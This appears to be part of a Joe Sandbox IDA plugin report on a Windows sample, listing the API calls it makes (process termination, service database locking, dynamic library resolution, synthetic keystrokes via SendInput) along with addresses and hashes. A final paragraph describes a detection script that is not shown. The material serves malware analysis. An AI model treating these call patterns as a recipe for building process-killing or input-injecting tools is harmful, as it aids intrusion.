                                                                              • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                              • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                              • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                              • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                              • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                              • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                              • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3495660284-0
                                                                              • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                              • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                              • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                              • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 839392675-0
                                                                              • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                              • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                              • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                              • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\r6lOHDg9N9.exe,00000004), ref: 00436055
                                                                              • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                              • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                              • GetLastError.KERNEL32 ref: 00436081
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                              • String ID:
                                                                              • API String ID: 1690418490-0
                                                                              • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                              • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                              • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                              • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                              APIs
                                                                                • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                              • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                              • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                              • CoUninitialize.OLE32 ref: 00475D71
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                              • String ID: .lnk$HH
                                                                              • API String ID: 886957087-3121654589
                                                                              • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                              • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                              • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                              • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1173514356-4108050209
                                                                              • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                              • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                              • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                              • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                              • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 763830540-1403004172
                                                                              • Opcode ID: 509af3a058f8d2ccd68eb6fec456bdedc6df801b0ffdee10d368a4f30f08f539
                                                                              • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                              • Opcode Fuzzy Hash: 509af3a058f8d2ccd68eb6fec456bdedc6df801b0ffdee10d368a4f30f08f539
                                                                              • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentHandleProcess$Duplicate
                                                                              • String ID: nul
                                                                              • API String ID: 2124370227-2873401336
                                                                              • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                              • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                              • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                              • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentHandleProcess$Duplicate
                                                                              • String ID: nul
                                                                              • API String ID: 2124370227-2873401336
                                                                              • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                              • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                              • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                              • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                              • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                              • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                              • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                              • String ID: SysAnimate32
                                                                              • API String ID: 3529120543-1011021900
                                                                              • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                              • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                              • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                              • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                              APIs
                                                                              • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                              • TranslateMessage.USER32(?), ref: 0044308B
                                                                              • DispatchMessageW.USER32(?), ref: 00443096
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Peek$DispatchTranslate
                                                                              • String ID: *.*
                                                                              • API String ID: 1795658109-438819550
                                                                              • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                              • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                              • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                              • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                              APIs
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                              • GetFocus.USER32 ref: 004609EF
                                                                                • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                              • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                              • __swprintf.LIBCMT ref: 00460A7A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                              • String ID: %s%d
                                                                              • API String ID: 991886796-1110647743
                                                                              • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                              • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                              • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                              • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$_sprintf
                                                                              • String ID: %02X
                                                                              • API String ID: 891462717-436463671
                                                                              • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                              • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                              • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                              • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0042CD00
                                                                              • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\r6lOHDg9N9.exe,?,C:\Users\user\Desktop\r6lOHDg9N9.exe,004A8E80,C:\Users\user\Desktop\r6lOHDg9N9.exe,0040F3D2), ref: 0040FFCA
                                                                                • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                              • String ID: $OH$@OH$X
                                                                              • API String ID: 3491138722-1394974532
                                                                              • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                              • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                              • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                              • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                              • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                              • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                              • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                              • String ID:
                                                                              • API String ID: 2449869053-0
                                                                              • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                              • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                              • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                              • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                              • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                              • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                              • SendInput.USER32 ref: 0044C509
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardMessagePostState$InputSend
                                                                              • String ID:
                                                                              • API String ID: 3031425849-0
                                                                              • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                              • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                              • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                              • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
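The two records above (LoadLibraryW / GetProcAddress / FreeLibrary at 00463DD1 onward, and SetKeyboardState / PostMessageW / SendInput at 0044C3DA onward) are the kind of API clusters an analyst scans this report for by hand. The following script is an added example, not Joe Sandbox code and not part of this report: it parses the report's `APIs` record format and flags three clusters with rules of my own choosing (runtime import resolution, synthetic keystroke delivery, enumerate-then-delete on registry keys). The sample text embedded in it is a constructed copy of three records from this page; the message constants 0x0100 to 0x0105 are the documented WM_KEYDOWN, WM_KEYUP, WM_CHAR and WM_SYSKEYUP values, and whether a given cluster is malicious is a judgement for the analyst, not the script.

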